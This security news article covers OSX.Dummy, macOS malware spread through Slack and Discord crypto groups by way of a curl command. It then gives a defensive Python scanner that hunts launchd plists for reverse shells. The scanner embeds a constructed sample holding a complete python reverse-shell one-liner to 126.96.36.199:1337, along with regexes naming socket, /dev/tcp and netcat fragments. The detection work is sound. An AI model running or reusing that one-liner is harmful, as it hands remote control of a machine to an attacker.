Several macOS malware attacks have been identified in the past few days, with victims targeted via the Slack and Discord chat platforms. The attackers are going after cryptocurrency investors and are posting messages in Slack and Discord groups linked to cryptocurrencies.
This is an impersonation attack: admins and key personnel of those groups are being impersonated, and users are advised to run a script that downloads a malware variant named OSX.Dummy via curl.
The binary is 34MB in size, which should itself be a warning sign, although at the time of writing it was not being picked up by any AV products on VirusTotal, according to security researcher Remco Verhoef, who recently posted about the attacks on the SANS ISC InfoSec forum.
Patrick Wardle, chief research officer at Digita Security, also wrote about the attack in a recent blog post. Wardle notes that an unsigned binary would usually be blocked by Gatekeeper, but a file that is downloaded with curl and run directly from the terminal executes without Gatekeeper being involved. The reason is that Gatekeeper only evaluates files carrying the quarantine extended attribute that browsers and other quarantine-aware apps set on downloads; curl does not set it, so there is nothing to trigger the check.
Once the binary is run, the malware changes its own file ownership to root, which requires the user to enter their password in the terminal. If the user does so, the malware drops code to achieve persistence.
Verhoef explained in his post, “The bash script (which runs a python command) tries to connect to 126.96.36.199 at port 1337 within a loop and the python code creates a reverse shell. To ensure execution during startup it creates a launch daemon.” Should the attack be successful, it would allow the attacker to take full control of an infected device. However, in the version examined by Verhoef, the malware was unable to connect to its C2.
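The persistence described above, a launch daemon whose job is a bash script that loops a python reverse shell, leaves a file on disk that can be hunted for. The scanner below is an added example written for this page; it is not code from Verhoef's or Wardle's analysis and not the malware's own plist. It parses launchd job plists with the standard plistlib module and flags jobs that hand an interpreter a command line containing socket or /dev/tcp reverse-shell fragments, a hardcoded IP:port, or a script in a temp directory. The two embedded plists are constructed samples (the label com.example.dummy, the endpoint taken from the quote above, and the benign updater are all assumptions for illustration); pointing the script at real launchd directories or a mounted image works the same way.

```python
"""Hunt launchd jobs for interpreter-based reverse shells (added example, not the page's code)."""
import plistlib
import re
import sys
import tempfile
from pathlib import Path

# Real macOS launchd locations; pass other directories on the command line to scan an image.
LAUNCHD_DIRS = ["/Library/LaunchDaemons", "/Library/LaunchAgents",
                "/System/Library/LaunchDaemons", "~/Library/LaunchAgents"]

INTERPRETERS = {"python", "python2", "python2.7", "python3", "bash", "sh", "zsh",
                "perl", "ruby", "osascript"}
# Fragments typical of one-liner reverse shells: socket setup, fd duplication,
# the bash /dev/tcp trick, pty upgrades, netcat.
NET_RE = re.compile(r"socket\.socket|\.connect\(|os\.dup2\(|/dev/tcp/|pty\.spawn|\bnc\b|\bncat\b", re.I)
# "IP" followed by up to four punctuation chars and a port, e.g. ("126.96.36.199",1337) or 10.0.0.5/4444.
IPPORT_RE = re.compile(r"\b(\d{1,3}(?:\.\d{1,3}){3})\W{1,4}(\d{2,5})\b")
SHADY_DIRS = ("/tmp/", "/private/tmp/", "/var/tmp/", "/var/root/", "/Users/Shared/")


def program_args(job: dict) -> list:
    """Reconstruct the argv launchd would execute from Program / ProgramArguments."""
    args = [str(a) for a in job.get("ProgramArguments", [])]
    prog = job.get("Program")
    if prog and (not args or args[0] != prog):
        args.insert(0, str(prog))
    return args


def assess_job(job: dict) -> dict:
    """Return a finding for one parsed plist: label, command line, reasons, verdict."""
    args = program_args(job)
    cmd = " ".join(args)
    reasons = []
    interp = bool(args) and Path(args[0]).name in INTERPRETERS
    if interp:
        reasons.append(f"runs interpreter {Path(args[0]).name}")
    network = NET_RE.search(cmd) is not None
    if network:
        reasons.append("command line contains reverse-shell style socket code")
    m = IPPORT_RE.search(cmd)
    if m:
        network = True
        reasons.append(f"hardcoded endpoint {m.group(1)}:{m.group(2)}")
    shady = any(d in cmd for d in SHADY_DIRS)
    if shady:
        reasons.append("program or script lives in a temp or root-writable directory")
    if job.get("RunAtLoad"):
        reasons.append("RunAtLoad (starts at boot/login)")
    if job.get("KeepAlive"):
        reasons.append("KeepAlive (relaunched if killed)")
    # Network-capable one-liners are suspicious on their own; an interpreter fed a
    # script from /tmp is suspicious even before the script is read.
    return {"label": job.get("Label", "<no label>"), "command": cmd,
            "reasons": reasons, "suspicious": network or (interp and shady)}


def scan_dirs(dirs=LAUNCHD_DIRS) -> list:
    """Parse every *.plist in the given directories (XML or binary) and assess it."""
    findings = []
    for d in dirs:
        for p in sorted(Path(d).expanduser().glob("*.plist")):
            try:
                with p.open("rb") as fh:
                    job = plistlib.load(fh)
            except Exception as exc:  # a plist launchd cannot read is worth a look too
                job = {"Label": str(p), "ProgramArguments": []}
                findings.append({**assess_job(job), "path": str(p),
                                 "reasons": [f"unparseable plist: {exc}"], "suspicious": True})
                continue
            findings.append({**assess_job(job), "path": str(p)})
    return findings


# Constructed sample modelled on the behaviour quoted above (a daemon running a bash
# loop that launches a python reverse shell to 126.96.36.199:1337). Hypothetical label/path.
DUMMY_PLIST = """<?xml version="1.0" encoding="UTF-8"?>
<plist version="1.0"><dict>
  <key>Label</key><string>com.example.dummy</string>
  <key>ProgramArguments</key><array>
    <string>/bin/bash</string>
    <string>-c</string>
    <string>while :; do python -c 'import socket,subprocess,os;s=socket.socket();s.connect(("126.96.36.199",1337));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);subprocess.call(["/bin/sh","-i"])'; sleep 30; done</string>
  </array>
  <key>RunAtLoad</key><true/>
  <key>KeepAlive</key><true/>
</dict></plist>
"""

# Constructed benign control: a vendor updater on a timer, no interpreter, no network code.
BENIGN_PLIST = """<?xml version="1.0" encoding="UTF-8"?>
<plist version="1.0"><dict>
  <key>Label</key><string>com.example.updater</string>
  <key>ProgramArguments</key><array>
    <string>/Library/Application Support/Example/updater</string>
    <string>--check</string>
  </array>
  <key>StartInterval</key><integer>3600</integer>
</dict></plist>
"""


def demo() -> dict:
    """Write the constructed plists to a temp dir and scan it offline; keyed by Label."""
    with tempfile.TemporaryDirectory() as d:
        Path(d, "com.example.dummy.plist").write_text(DUMMY_PLIST)
        Path(d, "com.example.updater.plist").write_text(BENIGN_PLIST)
        return {f["label"]: f for f in scan_dirs([d])}


if __name__ == "__main__":
    results = scan_dirs(sys.argv[1:]) if len(sys.argv) > 1 else demo().values()
    for f in results:
        flag = "SUSPICIOUS" if f["suspicious"] else "ok"
        print(f"{flag:10} {f['label']}: {'; '.join(f['reasons']) or 'no indicators'}")
```

Run it with no arguments to see the constructed samples scored, or with one or more directories (for example /Library/LaunchDaemons, or the same path under a mounted disk image) to triage a real host. RunAtLoad and KeepAlive are recorded but never decide the verdict on their own, since plenty of legitimate daemons set both; the verdict hinges on network-capable code in the job's command line or an interpreter being pointed at a script in a temp directory.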